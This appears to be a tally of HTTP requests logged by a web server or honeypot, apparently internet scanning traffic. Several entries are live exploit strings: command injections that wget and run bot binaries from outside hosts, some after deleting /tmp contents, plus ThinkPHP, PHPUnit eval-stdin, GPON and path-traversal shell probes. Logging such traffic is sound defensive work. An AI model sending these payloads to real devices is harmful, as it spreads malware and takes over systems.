1 | GET | /docs/cplugError.html/ |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /fuN3 |
HTTP/1.0 |
2 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /js/core.js |
HTTP/1.1 |
1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http[:]//134[.]195[.]138[.]33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ |
HTTP/1.1 |
1 | GET | /nmaplowercheck1657753799 |
HTTP/1.1 |
1 | GET | /pools/default/buckets |
HTTP/1.1 |
1 | GET | /pools |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//194[.]31[.]98[.]205/bins/aqua.mpsl;sh+/tmp/aqua.mpsl |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+networkmapping[.]xyz/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//azenv[.]net/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
2 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
2 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
4 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /cn/cmd |
HTTP/1.1 |
1 | POST | /dvr/cmd |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |